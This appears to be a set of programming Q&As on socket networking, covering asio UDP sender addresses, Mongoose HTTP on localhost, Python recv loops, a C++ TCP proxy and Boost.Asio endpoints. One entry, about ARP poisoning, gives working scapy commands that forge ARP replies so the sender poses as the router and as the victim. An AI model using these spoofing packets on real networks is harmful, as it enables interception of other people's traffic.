I wrote a small protocol stack to connect to KNX/IP routers. The mechanism is as follows:
Discovery_Channel: For discovery the client sends out an UDP/IP packet to multicast address 224.0.23.12. KNX/IP routers listen to this multicast address and reply. The KNX/IP router can potentially be connected to multiple KNX media, so the answer contains a list of services with IP addresses and port, the client can connect to.
Communication_Channel: The discovered services from all KNX/IP routers are presented to the user to select which service a connection should be made to.
The problem is that the answer from the KNX/IP routers sometimes doesn't contain a valid IP address, but just 0.0.0.0. In this case I need to take the IP address from where the packet came from. But how can I get this with (non-boost version of) asio?
My code looks like this:
/** client socket */
asio::ip::udp::socket m_socket;
/** search request */
void search_request(
const IP_Host_Protocol_Address_Information & remote_discovery_endpoint = IP_Host_Protocol_Address_Information({224, 0, 23, 12}, Port_Number),
const std::chrono::seconds search_timeout = SEARCH_TIMEOUT);
/** search response initiator */
void Discovery_Channel::async_receive_response() {
/* prepare a buffer */
m_response_data.resize(256);
/* async receive */
m_socket.async_receive(
asio::buffer(m_response_data),
std::bind(&Discovery_Channel::response_received, this, std::placeholders::_1, std::placeholders::_2));
}
/** response received handler */
void Discovery_Channel::response_received(const std::error_code & error, std::size_t bytes_transferred) {
// here the answer provided in m_response_data gets interpreted.
// #todo how to get the IP address of the sender?
/* start initiators */
async_receive_response();
}
So how can I retrieve the IP address of the sender in the Discovery_Channel::response_received method? I basically only have the packet data in m_response_data available.
On datagram sockets you can (should, likely) use async_receive_from.
It takes a reference to an endpoint variable that will be set to the remote endpoint on success.
Related
I'm having issues building an HTTP server using the Cesanta Mongoose web server library. The issue that I'm having occurs when I have an HTTP server built to listen on port 8080, and a client sending an HTTP request to localhost:8080. The problem is that the server processes the request fine and sends back a response, but the client only processes and prints the response after I kill the server process. Basically Mongoose works where you create connections which take an event handler function, ev_handler(). This event handler function is called whenever an
"event" occurs, such as the receiving of a request or a reply. On the server side, the event handler function is called fine when it receives a request from the client on 8080. However, the client-side event handler function is not called when the response sends the reply, but is called only after the server process is killed. I suspected that this may have something to do with the fact that the connection is on localhost, and I was right - this issue does not occur when the client sends requests to addresses other than localhost. The event handler function is called fine. Here is the ev_handler function on the client-side for reference:
static void ev_handler(struct mg_connection *c, int ev, void *p) {
if (ev == MG_EV_HTTP_REPLY) {
struct http_message *hm = (struct http_message *)p;
c->flags |= MG_F_CLOSE_IMMEDIATELY;
fwrite(hm->message.p, 1, (int)hm->message.len, stdout);
putchar('\n');
exit_flag = 1;
} else if (ev == MG_EV_CLOSE) {
exit_flag = 1;
};
}
Is this a common issue when trying to establish a connection on localhost with a server on the same computer?
The cause of such behavior is the fact that client connection does not fire an event until all data is read. How client knows the all data is read? There are 3 possibilities:
Server has sent Content-Length: XXX header and client has read XXX bytes of the message body, so it knows it received everything.
Server has sent Transfer-Encoding: chunked header, and sent all data chunks followed by an empty chunk. When client receives an empty chunk, it knows it received everything.
Server set neither Content-Lenth, nor Transfer-Encoding. Client does not know in this case what is the size of the body, and it keeps reading until server closes the connection.
What you see is (3). Solution: set Content-Length in your server code.
I have a web proxy that starts a TCP listener socket that accepts connections from clients. The listener accepts connections via:
clientConnection, clientAddress = listenerSocket.accept()
and then a new thread handles the client connection from there.
To mock a client connection, I am using telnet to connect to the proxy and issue commands. The proxy needs to receive data from telnet and I need to make sure that I receive all of it. To achieve this, I am doing the following:
while True:
requestBytes = clientConnection.recv(1024)
if not requestBytes:
break
requestBuffer += requestBytes
The proxy then decodes the bytes and does some things with them that takes a little bit of time, and then has to send a response back to the same client. However, when using the above code the connection with clientConnection gets closed long before I can process the bytes and respond.
Here's what I don't understand, when I use the following instead:
while True:
requestBytes = clientConnection.recv(1024)
requestBuffer += requestBytes
break
It works just fine and the clientConnection remains intact. This obviously has a problem if I receive more than 1024 bytes, but the clientConnection does not get closed.
More specifically, the error occurs after I have a response to send to the client and call:
clientConnection.sendall(response)
clientConnection.shutdown(1)
clientConnection.close()
The line clientConnection.shutdown(1) throws the error:
[Errno 107] Transport endpoint is not connected
which is confusing because somehow it was able to still call sendall on the previous line. Note that I did not actually receive anything on the client side.
I am sure that the connection is not getting closed elsewhere in the code. What exactly is happening here and what is the best way to do something like recvall and keep the clientConnection open?
I am working on a client/server solution in C++.
From the client, I am sending data to my server, and from this server I am sending to another server. I am able to configure port and IP address, and am able to send successfully.
But, the other server (which is not on my side) needs to establish only one TCP connection from my side, after that only sending and receiving needs to happen.
If I am connecting twice (say from two clients at the same time), it shows connection refused.
Part of the code is shown below:
while ((len = stream->receive(input, sizeof(input)-1)) > 0 )
{
input[len] = NULL;
//Code Addition by Srini starts here
//Client declaration
TCPConnector* connector_client = new TCPConnector();
printf("ip_client = %s\tport_client = %s\tport_client_int = %d\n", ip_client.c_str(), port_client.c_str(),atoi(port_client.c_str()));
TCPStream* stream_client = connector_client->connect(ip_client.c_str(), atoi(port_client.c_str()));
//Client declaration ends
if (stream_client)
{
//message = "Is there life on Mars?";
//stream_client->send(message.c_str(), message.size());
//printf("sent - %s\n", message.c_str());
stream_client->send(input, sizeof(input));
printf("sent - %s\n", input);
len = stream_client->receive(line, sizeof(line));
line[len] = NULL;
printf("received - %s\n", line);
delete stream_client;
}
//Code Additon by Srini ends here
stream->send(line, len);
printf("thread %lu, echoed '%s' back to the client\n",
(long unsigned int)self(), line);
}
The full thread code where receiving from client, sending to server, receiving from server, and sending to client is shown in the below link:
https://pastebin.com/UmPQJ70w
How can I change my design flow? Even in a basic diagram of client/server program. When the client calls connect(), then the server calls accept() every time, then sending/receiving happens. So, what can be done to modify the flow so that the client can connect only once?
Your intermediate server (which is acting as a proxy, so lets call it that) needs to maintain a single connection to the other server and delegate messaging with it in parallel to the messaging being done between your proxy and its clients.
I would suggest creating a separate thread whose sole task is to maintain that connection to the other server, and to send/receive messages with it.
When a client sends a message to your proxy, place the message in a thread-safe queue somewhere. Have the thread check the queue periodically and send any queued messages to the other server.
When the other server sends a message to your proxy, the thread can receive it and forward it to the appropriate client.
I am trying to use the "ip is at macadress" option but cant figure how to do so... here is my code atm:
from scapy.all import *
victim = "192.168.5.51"
spoof = "192.168.5.46"
op=2
mac = "88:00:2e:00:87:00"
while True:
arp = ARP(op=op, psrc=spoof, pdst=victim, hwdst=mac)
send(arp)
What I am looking for is to send the victim ip a ARP packet with the the default gateway ip/mac and send the gateway the ip/mac of the attacker
The attack is arp poisonning
It's a bit unclear what you're trying to achieve, but if all that you're interested in is creating an ARP reply of the form "192.168.5.51 is at 00:00:00:00:00:00", in which the values of all other fields are irrelevant, then this should suffice:
send(ARP(op=ARP.is_at, psrc='192.168.5.51', hwsrc='00:00:00:00:00:00'))
EDIT:
This sends the victim an ARP reply packet with the local machine masquerading as the router:
send(ARP(op=ARP.is_at, psrc=router_ip, hwdst=victim_mac, pdst=victim_ip))
This sends the router an ARP reply packet with the local machine masquerading as the victim:
send(ARP(op=ARP.is_at, psrc=victim_ip, hwdst=router_mac, pdst=router_ip))
In both of these packets, the hwsrc field is filled by default with the local machine's MAC address.
I have the following connection set up, this works correctly. This is part of a larger piece of code which listens (at a free port), for incoming messages. What I am trying to do is publish the uri so that other clients can connect to this. However I cannot figure out a way for the endpoint.address() to appear as the actual IP address on the interface being used rather than "localhost". Any ideas?
tcp::resolver::query query(address, "");
tcp:: endpoint endpoint = *resolver.resolve(query);
acc.open(endp.protocol());
acc.set_option(reuse_address(true));
acc.bind(endp);
acc.listen();
tcp::endpoint endpoint = acc.local_endpoint() ;
string uri = "tcp://" + endpoint.address().to_string() + ":" + lexical_cast<string>(endpoint.port()) ;
Boost ASIO has no way to enum all the interfaces of your computer. resolver query your DNS for your IP, witch is not the same as it can return whatever you have configured in it (even inacurrate information can be retrieved).
If you want to bind to the default interface. you don't need to make a resolve.
Just create the socket with the following endpoint :
boost::asio::ip::tcp::endpoint endpoint =
boost::asio::ip::tcp::endpoint(boost::asio::ip::tcp::v4(),port);